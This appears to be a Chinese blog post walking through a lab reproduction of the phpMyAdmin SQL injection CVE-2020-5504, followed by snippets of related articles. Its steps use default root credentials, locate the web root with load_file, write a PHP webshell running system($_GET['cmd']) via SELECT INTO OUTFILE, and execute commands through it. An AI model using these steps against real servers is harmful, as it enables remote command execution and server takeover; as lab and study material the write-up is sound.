phpmyadmin SQL注入(CVE-2020-5504)

最新推荐文章于 2024-09-13 10:36:44 发布
最新推荐文章于 2024-09-13 10:36:44 发布
阅读量704 收藏 4
点赞数 6
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/136304612
版权

漏洞描述;

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。

当Phpmyadmin <= 5.00和Phpmyadmin <= 4.94时,在用户帐户页面中存在一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。

登陆页面:http://ip:port/pma/index.php 账号密码root 123456

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.访问登录页面

http://ip:port/pma/index.php

账号:root

密码:123456

3.点击SQL 输入 select @@datadir(查询数据库的路径)

4.输入 select @@basedir(查询MYSQL数据库的安装路径)

5.查看 SELECT load_file('/var/www/html/pma/index.php')

返回数据包3kb,证明有数据。所以网站绝对路径为/var/www/html/pma

6.构造木马

​select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php'

7.使用写入的参数cmd传入值 id

http://ip:port/pma/shell.php?cmd=id

借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;数据库被恶意操作;服务器被远程控制,被安装后门。

修复建议:

1.升级版本。

慕筱蚺
关注
phpmyadmin SQL注入CVE-2020-5504
千寻的博客
03-07 1484
phpMyAdminphpMyAdmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
Phpmyadmin 后台sql注入漏洞(CVE-2020-5504
jammny
11-29 2558
Phpmyadmin 后台sql注入漏洞(CVE-2020-5504) 一、漏洞简介 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 二、漏洞影响 Phpmyadmin <= 5.00 Phpmyadmin <= 4.94 三、漏洞分析 https://xz.aliyun.com/t/7092 四、漏洞利用 登陆进入后台界面,将获取到的token值记下来。
phpmyadmin靶场
最新发布
wtl3333的博客
09-13 121
phpmyadmin靶场
phpmyadmin SQL注入 漏洞(CVE-2020-5504
xy_wjyjw的博客
10-31 618
输入 select @@datadir(查询数据库的路径),根据镜像给的信息(后台路径和用户名密码)进行访问并登录。所以网站绝对路径为/var/www/html/pma。输入 select @@basedir(查询。使用传入的参数cmd传入值,获取flag。phpmyadmin SQL注入。返回数据包3kib,一看就有东西。登录成功进入后台,点击sql
[Vulfocus解题系列] phpmyadmin SQL注入CVE-2020-5504
00勇士王子的博客
10-01 3922
漏洞介绍 名称: phpmyadmin SQL注入CVE-2020-5504) 描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 解题过程 1.访问题目环境,因为这个漏洞是phpmyadmin的后台漏洞,
phpmyadmin SQL注入CVE-2020-5504)复现
weixin_63124284的博客
10-26 2499
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 2802
VULFOCUS CVE-2020-5504
PhpMyadminSQL注入(CVE-2020-0554)复现
玄道的网安博客
09-16 1966
简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。 影响版本 phpMyAdmin 4 < 4.9.4 phpMyAdmin 5 < 5.0.1 环境搭建 为了方便做事,这里我直接用把phpmyadmin文件拖入刀集成环境中 下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm...
【漏洞复现-phpmyadmin-SQL注入】vulfocus/phpmyadmin-cve_2020_5504
10-12 3033
phpmyadmin-SQL注入】写马
phpmyadmin SQL注入CVE-2020-5504) 复现
YouthBelief的博客
11-11 4301
phpmyadmin SQL注入CVE-2020-5504phpmyadmin SQL注入CVE-2020-5504)0x01 漏洞描述0x02 影响范围0x03 漏洞复现漏洞利用0x04 漏洞修复 phpmyadmin SQL注入CVE-2020-5504) 0x01 漏洞描述 phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞
phpMyAdmin $_REQUEST参数发现SQL注入漏洞
phphot
04-07 1916
发布日期:2008-03-01更新日期:2008-03-04受影响系统:phpMyAdmin phpMyAdmin 不受影响系统:phpMyAdmin phpMyAdmin 2.11.5描述:BUGTRAQ ID: 28068phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQLphpMyAdmin使用$_REQUEST而不是$_GET和$_POST变量作为其参数来源,并且在SQ
payload sql注入_phpMyAdmin后台SQL注入(CVE-2020-0554)
weixin_39682477的博客
12-20 310
0x01 简介phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。0x02 漏洞概述用户界面SQL执行语句存在可控变量,且未对可控参数进行过滤直接拼接。可造成低权限用户越权执行SQL指令。0...
vulfocus phpmyadmin SQL注入CVE-2020-5504
weixin_61913198的博客
10-19 489
描述: phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。然后来到sql命令执行处可以直接执行sql命令,现在想要上传webshell需要找到网站绝对路径,常规思路让网站报错或者找phpinfo,找了一大圈没找到,这个时候就需要猜网站绝对路径了,还记得前面那个nginx嘛?访问http://ip/pma/index.php登陆,账号密码为admin 123456。
漏洞复现-phpmyadmin_SQL注入CVE-2020-5504
qq_58683895的博客
10-27 845
phpMyAdminPhpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。路径:/pma/index.php 密码root:123456。证明有东西,应该就是首页,那网站的路径即为/var/www/html/pma。
sql注入phpmyadmin日志写入webshell
weixin_54813510的博客
05-25 1944
写入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
phpmyadmin CVE-2016-5734
weixin_51692662的博客
11-03 264
phpmyadmin CVE-2016-5734
一道sql注入的ctf题目致使用phpmyadmin上传 webshell 拿后台权限
carrot11223的博客
02-02 1494
于是变成了这样子,然后我抛出所有的库,在库里面找到一个比较可疑的库,然后跑所有的表,找了一个可能包含用户名密码的表,抛出里面的内容,我发现确实很快,那为什么之前一直那么慢呢?5. PHPS文件泄露,phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。跑了一堆杂货,于是我又去跑了目录,发现有http://c63d6b5a18c915cb.node.nsctf.cn/phpmyadmin/index.php,还以为上面的东西就是账号和密码,白高兴一场。
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
更进一步,通过结合其他技术,如SQL注入或开启MySQL的`general_log`,攻击者可能能够实现远程代码执行(RCE),获取服务器的完全控制权。 解决方法: 修复此漏洞的关键在于更新到不受影响的PHPMyAdmin版本。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值